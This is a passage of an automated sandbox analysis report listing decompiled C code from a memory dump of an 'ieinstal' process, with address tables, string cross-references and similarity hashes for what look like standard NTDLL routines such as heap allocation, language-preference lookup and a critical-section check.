0x1f01a34a
0x1f01a34c
0x1f01a34c
0x1f01a34f
0x1f01a34f
0x1f01a352
0x1f01a355
0x1f01a355
0x1f01a360
0x1f01a363
0x1f01a367
0x1f01a36d
0x1f01a370
0x1f01a371
0x1f01a374
0x00000000
0x00000000
0x00000000
0x1f01a376
0x1f01a338
0x1f01a33b
0x1f01a341
0x1f01a342
0x1f01a345
0x1f01a348
0x00000000
0x00000000
0x00000000
0x1f01a348
0x00000000
0x1f01a2f9
0x1f01a2d6
0x1f01a2da
0x00000000
0x00000000
0x00000000
0x1f01a2da
0x1efbcde2
0x1efbcde2

Strings

AlternateCodePage, xrefs: 1EFBCD9E

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: AlternateCodePage
API String ID: 0-3889302423
Opcode ID: ac81e38670ed8002fd0ab1fe68d314ddfa2482ffcebd0f89dcedad98e7dd1c79
Instruction ID: bca9d9f46fd42d401800fd8f7b4f43c85b417803d21413f04597a7b5f3132f2d
Opcode Fuzzy Hash: ac81e38670ed8002fd0ab1fe68d314ddfa2482ffcebd0f89dcedad98e7dd1c79
Instruction Fuzzy Hash: DB418276D00209ABDB14DF99CD90BEEB7F8EF84710F11465AE911EB250E734EA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1F04CB20 Relevance: 1.4, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1F04CB20(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t38;
				void* _t39;
				void* _t40;
				signed short _t60;
				intOrPtr _t61;
				signed short* _t72;
				intOrPtr* _t74;
				void* _t87;
				intOrPtr* _t88;
				void* _t89;

				_push(0x68);
				_push(0x1f09ce40);
				E1F017C40(__ebx, __edi, __esi);
				_t72 =  *(_t89 + 8);
				_t38 =  *((intOrPtr*)(_t89 + 0xc));
				 *((intOrPtr*)(_t89 - 0x50)) = _t38;
				 *((intOrPtr*)(_t89 - 0x4c)) = _t38;
				if(( *0x1f0b391c & 0x00000004) == 0) {
					L16:
					_t39 = 0xc000000d;
					L17:
					 *[fs:0x0] =  *((intOrPtr*)(_t89 - 0x10));
					return _t39;
				}
				_t40 = E1EFC34C0(_t72[2]);
				if(_t40 == 0 || _t40 == 3 || _t40 == 5) {
					goto L16;
				} else {
					_t87 = L1EFD58B0(0, _t72, 0, _t89 - 0x5c, 0, 0, 0);
					if(_t87 < 0) {
						L6:
						_t39 = _t87;
						goto L17;
					}
					 *((intOrPtr*)(_t89 - 0x74)) = 0x18;
					 *((intOrPtr*)(_t89 - 0x70)) = 0;
					 *((intOrPtr*)(_t89 - 0x68)) = 0x40;
					 *((intOrPtr*)(_t89 - 0x6c)) = _t89 - 0x5c;
					 *((intOrPtr*)(_t89 - 0x64)) = 0;
					 *((intOrPtr*)(_t89 - 0x60)) = 0;
					_push(_t89 - 0x48);
					_push(_t89 - 0x74);
					_t87 = E1F002D80();
					E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t89 - 0x58)));
					if(_t87 >= 0) {
						_t88 = E1EFD5D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, ( *_t72 & 0x0000ffff) + 0xa);
						 *((intOrPtr*)(_t89 - 0x54)) = _t88;
						if(_t88 != 0) {
							_t23 = _t88 + 0xa; // 0xa
							E1F0088C0(_t23, _t72[2],  *_t72 & 0x0000ffff);
							 *((short*)(_t88 + 8)) =  *_t72;
							L1EFD2330( *_t72, 0x1f0b67d4);
							 *((intOrPtr*)(_t89 - 4)) = 0;
							_t60 = ( *0x1f0b33e0 & 0x0000ffff) + 2 + ( *_t72 & 0x0000ffff);
							 *(_t89 - 0x78) = _t60;
							if(_t60 <= 0xfffe) {
								 *0x1f0b33e0 = _t60;
								_t61 =  *0x1f0b33d8; // 0x772533d8
								if( *((intOrPtr*)(_t61 + 4)) != 0x1f0b33d8) {
									0x1f0b33d8 = 3;
									asm("int 0x29");
								}
								 *_t88 = _t61;
								 *((intOrPtr*)(_t88 + 4)) = 0x1f0b33d8;
								 *((intOrPtr*)(_t61 + 4)) = _t88;
								 *0x1f0b33d8 = _t88;
								 *((intOrPtr*)(_t89 - 4)) = 0xfffffffe;
								_t74 =  *((intOrPtr*)(_t89 - 0x50));
								L1EFD2330(E1F04CCCC(), 0x1f0b67c4);
								 *((intOrPtr*)(_t89 - 0x4c)) = E1EFFD532(0x1f0b4fe0);
								E1EFD24D0(0x1f0b67c4);
								_t66 =  *((intOrPtr*)(_t89 - 0x4c));
								if( *((intOrPtr*)(_t89 - 0x4c)) != 0) {
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t66);
								}
								 *_t74 = _t88;
								_t39 = 0;
							} else {
								E1F006EB0(_t89, 0x1f0bb370, _t89 - 0x10, 0xfffffffe);
								_t39 = 0xc0000106;
							}
						} else {
							_t39 = 0xc0000017;
						}
						goto L17;
					}
					goto L6;
				}
			}

0x1f04cb20
0x1f04cb22
0x1f04cb27
0x1f04cb2c
0x1f04cb2f
0x1f04cb32
0x1f04cb35
0x1f04cb3f
0x1f04ccd7
0x1f04ccd7
0x1f04ccdc
0x1f04ccdf
0x1f04cceb
0x1f04cceb
0x1f04cb48
0x1f04cb4f
0x00000000
0x1f04cb67
0x1f04cb7a
0x1f04cb7e
0x1f04cbc2
0x1f04cbc2
0x00000000
0x1f04cbc2
0x1f04cb80
0x1f04cb87
0x1f04cb8a
0x1f04cb94
0x1f04cb97
0x1f04cb9a
0x1f04cba0
0x1f04cba4
0x1f04cbaa
0x1f04cbb9
0x1f04cbc0
0x1f04cbdf
0x1f04cbe1
0x1f04cbe6
0x1f04cbf9
0x1f04cbfd
0x1f04cc08
0x1f04cc11
0x1f04cc16
0x1f04cc26
0x1f04cc28
0x1f04cc30
0x1f04cc4f
0x1f04cc55
0x1f04cc62
0x1f04cc66
0x1f04cc67
0x1f04cc67
0x1f04cc69
0x1f04cc6b
0x1f04cc6e
0x1f04cc71
0x1f04cc77
0x1f04cc7e
0x1f04cc8b
0x1f04cc9a
0x1f04cca2
0x1f04cca7
0x1f04ccac
0x1f04ccb9
0x1f04ccb9
0x1f04ccbe
0x1f04ccc0
0x1f04cc32
0x1f04cc3d
0x1f04cc45
0x1f04cc45
0x1f04cbe8
0x1f04cbe8
0x1f04cbe8
0x00000000
0x1f04cbe6
0x00000000
0x1f04cbc0

Strings

@, xrefs: 1F04CB8A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ed7776767fa7da78467d07e095d7f7bfd471de83dcb844832db8b12c37f3a6ab
Instruction ID: b08cf54cfa4500f1c8434d11027bc0faa7528a3d1ae804c321a97a8ef155961e
Opcode Fuzzy Hash: ed7776767fa7da78467d07e095d7f7bfd471de83dcb844832db8b12c37f3a6ab
Instruction Fuzzy Hash: D941B2B9940655DFDB20DFA5C940AAEBBF8FF04B10F20853AE905DB250E734E900CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1F07ADD6 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1F07ADD6(void* __ecx, intOrPtr __edx, char* _a4, short* _a8) {
				void* _v8;
				signed int _v12;
				char _v16;
				short _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				void* _t41;
				short _t52;
				char* _t57;
				void* _t64;
				short* _t68;
				void* _t75;
				void* _t77;
				void* _t78;

				_t77 = __ecx;
				_v24 = __edx;
				_v20 = 0;
				_t75 = 0;
				_v8 = 0xffffffff;
				if(__edx == 0 || __ecx == 0) {
					_t78 = 0xc000000d;
					goto L22;
				} else {
					_v12 = _v12 & 0;
					_v16 = 1;
					E1F005050(0xffffffff,  &_v36, L"PreferredUILanguages");
					_push(0xffffffff);
					_t64 = __ecx;
					_t41 = E1EFBD64A(__ecx,  &_v36,  &_v16, 0,  &_v12);
					if(_v12 == 0 || _t41 == 0xc0000034) {
						_t78 = 0xc0000001;
						goto L24;
					} else {
						_t75 = E1EFD5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
						if(_t75 != 0) {
							_push(_t64);
							_t65 = _t77;
							_t78 = E1EFBD64A(_t77,  &_v36,  &_v16, _t75,  &_v12);
							if(_t78 < 0) {
								L22:
								if(_t75 != 0) {
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t75);
								}
								goto L24;
							}
							if(_v16 == 1) {
								E1F005050(_t65,  &_v36, _t75);
								if(E1EFE56E0( &_v36,  &_v28) == 0) {
									goto L8;
								}
								_t52 = _v28;
								if(_t52 == 0x1000 || _t52 == 0x1400) {
									_t78 = E1EFBD853( &_v20, _v24, _v32, 0,  &_v20);
									if(_t78 < 0) {
										goto L22;
									}
									_push(3);
									_pop(1);
									goto L15;
								} else {
									_v20 = _t52;
									L15:
									_t78 = E1EFE4EDF(_v24, 1, _v20,  &_v8);
									if(_t78 >= 0) {
										_t57 = _a4;
										if(_t57 != 0) {
											 *_t57 = 2;
										}
										_t68 = _a8;
										if(_t68 != 0) {
											 *_t68 = _v8;
										}
									}
									goto L22;
								}
							}
							L8:
							_t78 = 0xc0000001;
							goto L22;
						} else {
							_t78 = 0xc0000017;
							L24:
							return _t78;
						}
					}
				}
			}

0x1f07ade0
0x1f07ade6
0x1f07adea
0x1f07adee
0x1f07adf3
0x1f07adf9
0x1f07af1a
0x00000000
0x1f07ae07
0x1f07ae07
0x1f07ae16
0x1f07ae19
0x1f07ae1e
0x1f07ae22
0x1f07ae2d
0x1f07ae35
0x1f07af13
0x00000000
0x1f07ae46
0x1f07ae59
0x1f07ae5d
0x1f07ae69
0x1f07ae6d
0x1f07ae7d
0x1f07ae81
0x1f07af1f
0x1f07af21
0x1f07af2f
0x1f07af2f
0x00000000
0x1f07af21
0x1f07ae8a
0x1f07ae9b
0x1f07aeaf
0x00000000
0x00000000
0x1f07aeb1
0x1f07aeb9
0x1f07aed9
0x1f07aedd
0x00000000
0x00000000
0x1f07aedf
0x1f07aee1
0x00000000
0x1f07aec2
0x1f07aec2
0x1f07aee2
0x1f07aef3
0x1f07aef7
0x1f07aef9
0x1f07aefe
0x1f07af00
0x1f07af00
0x1f07af03
0x1f07af08
0x1f07af0e
0x1f07af0e
0x1f07af08
0x00000000
0x1f07aef7
0x1f07aeb9
0x1f07ae8c
0x1f07ae8c
0x00000000
0x1f07ae5f
0x1f07ae5f
0x1f07af34
0x1f07af3a
0x1f07af3a
0x1f07ae5d
0x1f07ae35

Strings

PreferredUILanguages, xrefs: 1F07AE0F

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: b3efda4e7ffde7368a829d3d4b64bac869aee6aa741aa179e9eed3f42aa07352
Instruction ID: 7a2fa41f22a95e88476ea44870796deacb1b563420e5a273a31f548a315d00d3
Opcode Fuzzy Hash: b3efda4e7ffde7368a829d3d4b64bac869aee6aa741aa179e9eed3f42aa07352
Instruction Fuzzy Hash: 1241A476E00259EBDF11DAE4C850BEE77B9AF44750F0107A6E941A7260EB34EE80C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 1F066BDE Relevance: 1.4, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E1F066BDE(intOrPtr* __ecx, void* __edx, void* __eflags) {
				char _v12;
				signed char _v32;
				void* __ebx;
				void* __edi;
				void* _t33;
				signed int _t35;
				intOrPtr _t50;
				signed char _t53;
				void* _t56;
				intOrPtr* _t58;
				intOrPtr _t59;
				void* _t63;
				intOrPtr* _t64;
				signed int _t77;
				void* _t81;
				signed int _t90;

				_t55 = __edx;
				_t52 = __ecx;
				_t58 = __ecx;
				E1F085EBE(__ecx);
				_t50 =  *[fs:0x30];
				_t63 = 1;
				if(( *0x1f0b6638 & 0x00000010) != 0) {
					L2:
					 *0x1f0b6938 =  *0x1f0b6938 | 0x00000001;
					_t64 =  *0x1f0b6d44; // 0x0
					if(_t64 != 0) {
						L4:
						_t52 = _t64;
						 *0x1f0b91e0();
						 *_t64();
						L5:
						_t63 = 1;
						L6:
						if(( *0x1f0b4300 & 0x00000040) != 0) {
							 *0x1f0b47fc =  *0x1f0b47fc | 0xffffffff;
							_t77 =  *0x1f0b47fc;
							_t52 = _t58;
							 *0x1f0b47f8 = 0xff676980;
							E1F0688B1(_t58);
						}
						E1F06865A(_t52, _t55, _t77);
						if(( *0x1f0b6638 & 0x00000008) != 0) {
							 *0x1f0b6938 =  *0x1f0b6938 & 0x000000fe;
						}
						 *0x1f0b6628 = E1F07D919(_t52);
						_t59 = 2;
						if(( *( *[fs:0x30] + 0x68) & 0x00100000) != 0) {
							_t81 =  *0x1f0b6960 - _t63; // 0x0
							if(_t81 <= 0) {
								 *0x1f0b6960 = _t59;
							}
							 *0x1f0b6628 =  *0x1f0b6628 & 0x00000000;
						}
						_push( &_v12);
						_push(0);
						_push(0);
						_push( *((intOrPtr*)(_t50 + 8)));
						_t33 = 3;
						_push(_t33);
						E1EFCE580();
						_t53 = _v32;
						_t35 =  *(_t53 + 0x5c) & 0x0000ffff;
						if(_t35 == _t63 || _t35 == _t59) {
							L17:
							if( *((short*)(_t53 + 0x48)) >= 6) {
								asm("bt dword [0x1f0b6d38], 0xc");
								_t53 = (_t53 & 0xffffff00 | ( *0x1f0b6934 & 0x00000001) == 0x00000000) & (_t35 & 0xffffff00 | ( *0x1f0b6934 & 0x00000001) >= 0x00000000);
								asm("sbb eax, eax");
								 *0x1f0b6628 =  *0x1f0b6628 &  !( ~(_t53 & 0x000000ff));
							}
							goto L19;
						} else {
							_t56 = 3;
							if(_t35 != _t56) {
								L19:
								 *(_t50 + 0x88) =  *(_t50 + 0x88) & 0x00000000;
								 *((intOrPtr*)(_t50 + 0x8c)) = 0x10;
								 *((intOrPtr*)(_t50 + 0x90)) = 0x1f0b4840;
								E1EFEFBC0(0x1f0b4800, 0, 0x10000000);
								E1EFC2330(_t53);
								 *0x1f0b6d48 = E1EFC2330(_t53);
								if((E1EFC0670() & 0x00010000) != 0) {
									 *0x1f0b6638 =  *0x1f0b6638 | 0x00000004;
									_t90 =  *0x1f0b6638;
									 *0x1f0b3928 = 0x400;
								}
								E1F081163(_t50, _t53, _t90);
								return E1F0809BD(_t50, _t53, _t59, _t90);
							}
							goto L17;
						}
					}
					_t64 = E1EFC82E0(0xabababab, _t64, "kLsE", 1);
					 *0x1f0b6d44 = _t64;
					if(_t64 == 0) {
						goto L5;
					}
					goto L4;
				}
				_t52 = _t58;
				if(E1F0686C2(_t50, _t58, __edx) == 0) {
					goto L6;
				}
				goto L2;
			}

0x1f066bde
0x1f066bde
0x1f066bec
0x1f066bee
0x1f066bf3
0x1f066bfc
0x1f066c04
0x1f066c11
0x1f066c11
0x1f066c18
0x1f066c20
0x1f066c40
0x1f066c40
0x1f066c42
0x1f066c48
0x1f066c4a
0x1f066c4c
0x1f066c4d
0x1f066c54
0x1f066c56
0x1f066c56
0x1f066c5d
0x1f066c5f
0x1f066c69
0x1f066c69
0x1f066c6e
0x1f066c7a
0x1f066c7c
0x1f066c7c
0x1f066c88
0x1f066c95
0x1f066c9d
0x1f066c9f
0x1f066ca5
0x1f066ca7
0x1f066ca7
0x1f066cad
0x1f066cad
0x1f066cb8
0x1f066cb9
0x1f066cbb
0x1f066cbd
0x1f066cc2
0x1f066cc3
0x1f066cc4
0x1f066cc9
0x1f066ccd
0x1f066cd4
0x1f066ce3
0x1f066ce8
0x1f066cf4
0x1f066cff
0x1f066d06
0x1f066d0a
0x1f066d0a
0x00000000
0x1f066cdb
0x1f066cdd
0x1f066ce1
0x1f066d10
0x1f066d10
0x1f066d23
0x1f066d2d
0x1f066d37
0x1f066d3c
0x1f066d46
0x1f066d55
0x1f066d57
0x1f066d57
0x1f066d5e
0x1f066d5e
0x1f066d68
0x1f066d78
0x1f066d78
0x00000000
0x1f066ce1
0x1f066cd4
0x1f066c34
0x1f066c36
0x1f066c3e
0x00000000
0x00000000
0x00000000
0x1f066c3e
0x1f066c06
0x1f066c0f
0x00000000
0x00000000
0x00000000

Strings

kLsE, xrefs: 1F066C24

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: 7e4d017454b1f92f35cd10ca2844b893a8a13bdd4c02036b57188c4128674571
Instruction ID: 9724114eb9febd8dbedb260e366dac4cf9d1e5a2547b90a9eaa58ba752403ce4
Opcode Fuzzy Hash: 7e4d017454b1f92f35cd10ca2844b893a8a13bdd4c02036b57188c4128674571
Instruction Fuzzy Hash: 864147BA9017A286E320DF64CCD4BE53BD4EB40734F200269EC848F2C0DB766995E7A5

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBFF30 Relevance: 1.4, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1EFBFF30(intOrPtr* _a4) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr* _t43;
				char _t70;
				intOrPtr _t77;
				intOrPtr* _t79;

				_t79 = _a4;
				_t70 = 0;
				_t77 =  *[fs:0x30];
				_v32 = 0;
				_v28 = 0;
				_v12 = 0;
				 *((intOrPtr*)(_t79 + 4)) =  *((intOrPtr*)(_t77 + 0xa4));
				 *((intOrPtr*)(_t79 + 8)) =  *((intOrPtr*)(_t77 + 0xa8));
				 *(_t79 + 0xc) =  *(_t77 + 0xac) & 0x0000ffff;
				 *((intOrPtr*)(_t79 + 0x10)) =  *((intOrPtr*)(_t77 + 0xb0));
				_t43 =  *((intOrPtr*)(_t77 + 0x1f4));
				if(_t43 != 0 &&  *_t43 != 0) {
					if(E1EFE5C3F(_t79 + 0x14, 0x100, _t43) < 0) {
						 *((short*)(_t79 + 0x14)) = 0;
					}
					_t70 = 0;
				} else {
					 *((short*)(_t79 + 0x14)) = 0;
				}
				if( *_t79 != 0x11c) {
					if( *_t79 != 0x124) {
						L10:
						return 0;
					}
				}
				 *((short*)(_t79 + 0x114)) =  *(_t77 + 0xaf) & 0x000000ff;
				 *(_t79 + 0x116) =  *(_t77 + 0xae) & 0x000000ff;
				 *(_t79 + 0x118) = E1EFC0670();
				if( *_t79 == 0x124) {
					 *(_t79 + 0x11c) = E1EFC0670() & 0x0001ffff;
				}
				 *((char*)(_t79 + 0x11a)) = _t70;
				if(E1EFC0630( &_v16) != 0) {
					 *((char*)(_t79 + 0x11a)) = _v16;
				}
				E1F005050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
				_push( &_v24);
				_push(4);
				_push( &_v12);
				_push( &_v20);
				_push( &_v32);
				if(E1F003EE0() < 0 || _v12 != 1 || _v20 != 4 || _v24 != 4) {
					 *(_t79 + 0x118) =  *(_t79 + 0x118) & 0x0000ffef | 0x00000100;
					if( *_t79 == 0x124) {
						 *(_t79 + 0x11c) =  *(_t79 + 0x11c) & 0xfffdffef | 0x00000100;
					}
				}
				goto L10;
			}

0x1efbff3a
0x1efbff3d
0x1efbff40
0x1efbff4c
0x1efbff4f
0x1efbff52
0x1efbff5b
0x1efbff64
0x1efbff6e
0x1efbff77
0x1efbff7a
0x1efbff82
0x1f01e82e
0x1f01e832
0x1f01e832
0x1f01e836
0x1efbff8d
0x1efbff8f
0x1efbff8f
0x1efbff99
0x1efc005c
0x1efc004f
0x1efc0053
0x1efc0053
0x1efc005e
0x1efbffab
0x1efbffbc
0x1efbffcd
0x1efbffd6
0x1efc006d
0x1efc006d
0x1efbffdf
0x1efbffed
0x1efbfff2
0x1efbfff2
0x1efc0001
0x1efc0009
0x1efc000a
0x1efc000f
0x1efc0013
0x1efc0017
0x1efc001f
0x1efc0042
0x1efc004b
0x1efc0085
0x1efc0085
0x1efc004b
0x00000000

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1EFBFFF8

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
API String ID: 0-996340685
Opcode ID: f904b7aceb2e37191e77ff8bbe34fed3004c601069b794c4949535163fac2b56
Instruction ID: 5773cec448b7ebe8430de8d6a48160aefa9c659178f6f09623b09199a05d83b6
Opcode Fuzzy Hash: f904b7aceb2e37191e77ff8bbe34fed3004c601069b794c4949535163fac2b56
Instruction Fuzzy Hash: A5418035A0074B9ED724DFB5C460AEBB7F9AF4A300F104A2ED9A9C7240E335A545CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1F05AA40 Relevance: 1.3, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E1F05AA40(intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				void* __ebp;
				signed int _t21;
				intOrPtr _t25;
				intOrPtr _t46;
				signed int _t47;
				signed int _t52;
				signed int _t53;
				signed int _t58;

				_push(0xfffffffe);
				_push(0x1f09cf80);
				_push(E1F00AD20);
				_push( *[fs:0x0]);
				_t21 =  *0x1f0bb370;
				_v12 = _v12 ^ _t21;
				_push(_t21 ^ _t58);
				 *[fs:0x0] =  &_v20;
				_v28 = _t58 - 0x14;
				_t25 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
				_t46 = _a4;
				if( *((char*)(_t25 + 0x28)) == 0) {
					L3:
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						_push( *((intOrPtr*)(_t46 + 0xc)));
						_push(_t46);
						E1F04EF10(0x65, 0, "NTDLL: Calling thread (%p) not owner of CritSect: %p  Owner ThreadId: %p\n",  *((intOrPtr*)( *[fs:0x18] + 0x24)));
						asm("int3");
					}
					_t52 =  *0x1f0b5d38; // 0x38c68966
					_t47 =  *0x1f0b65fc; // 0x1dd48a8c
					if(_t47 == 0) {
						_push(_t47);
						_push(4);
						_push( &_v32);
						_push(0x24);
						_push(0xffffffff);
						if(E1F002B20() < 0) {
							L1F018AA0(_t40, _t47, _t34);
						}
						_t47 = _v32;
						 *0x1f0b65fc = _t47;
					}
					asm("ror esi, cl");
					_v36 = _t47 ^ _t52;
					_v8 = 0;
					L1F018AA0(0x20 - (_t47 & 0x0000001f), _t47 ^ _t52, 0xc0000264);
					_t53 = _v36;
					if(_t53 == 0) {
						return 0;
					} else {
						 *0x1f0b91e0(_v24);
						return  *_t53();
					}
				} else {
					if(_t46 != 0x1f0b3390) {
						L12:
						 *[fs:0x0] = _v20;
						return _t25;
					} else {
						_t40 =  *[fs:0x18];
						_t25 =  *((intOrPtr*)(_t25 + 0x2c));
						if(_t25 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
							goto L12;
						} else {
							goto L3;
						}
					}
				}
			}

0x1f05aa45
0x1f05aa47
0x1f05aa4c
0x1f05aa57
0x1f05aa5e
0x1f05aa63
0x1f05aa68
0x1f05aa6c
0x1f05aa72
0x1f05aa7b
0x1f05aa7e
0x1f05aa85
0x1f05aaa6
0x1f05aab0
0x1f05aab8
0x1f05aabb
0x1f05aac8
0x1f05aad0
0x1f05aad0
0x1f05aad1
0x1f05aad7
0x1f05aadf
0x1f05aae1
0x1f05aae2
0x1f05aae7
0x1f05aae8
0x1f05aaea
0x1f05aaf3
0x1f05aaf6
0x1f05aaf6
0x1f05aafb
0x1f05aafe
0x1f05aafe
0x1f05ab10
0x1f05ab14
0x1f05ab17
0x1f05ab23
0x1f05ab28
0x1f05ab2d
0x1f05ab3f
0x1f05ab2f
0x1f05ab34
0x1f05ab3c
0x1f05ab3c
0x1f05aa87
0x1f05aa8d
0x1f05ab4a
0x1f05ab4d
0x1f05ab5b
0x1f05aa93
0x1f05aa93
0x1f05aa9a
0x1f05aaa0
0x00000000
0x00000000
0x00000000
0x00000000
0x1f05aaa0
0x1f05aa8d

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 1F05AABF

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 93bc3e14dc2aee2a9edcfee9352417b372c899f55037095768c4c1db9887658e
Instruction ID: 041d154fac0cce41effbcbb565f28ae3231723a43ee9698f07db4f4b5496cade
Opcode Fuzzy Hash: 93bc3e14dc2aee2a9edcfee9352417b372c899f55037095768c4c1db9887658e
Instruction Fuzzy Hash: 033135B6A00758EFDB01CF54CD40F9AF7F6FB84B20F108269E90597690D739A840CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1EFE8BD1 Relevance: 1.3, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E1EFE8BD1(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E1F005050(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E1F003EE0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E1F003EE0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = E1EFD5D90(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x1efe8bd1
0x1efe8bdc
0x1efe8bde
0x1efe8be0
0x1efe8be5
0x1f02d004
0x1f02d004
0x00000000
0x1efe8beb
0x1efe8beb
0x1efe8bf0
0x00000000
0x1efe8c07
0x1efe8c0c
0x1efe8c11
0x1efe8c12
0x1efe8c13
0x1efe8c14
0x1efe8c18
0x1efe8c1e
0x1efe8c22
0x1f02cff0
0x1f02cff4
0x00000000
0x1f02cffa
0x1f02cffd
0x1f02cffd
0x1efe8c28
0x1efe8c2e
0x1efe8c4d
0x1efe8c4d
0x1efe8c4e
0x1efe8c53
0x1efe8c54
0x1efe8c57
0x1efe8c5d
0x1efe8c61
0x1efe8c71
0x1efe8c73
0x1f02d01a
0x1f02d01a
0x1efe8c63
0x1efe8c66
0x1efe8c66
0x1efe8c30
0x1efe8c30
0x1efe8c34
0x1efe8c7a
0x1efe8c36
0x1efe8c36
0x1efe8c47
0x1efe8c47
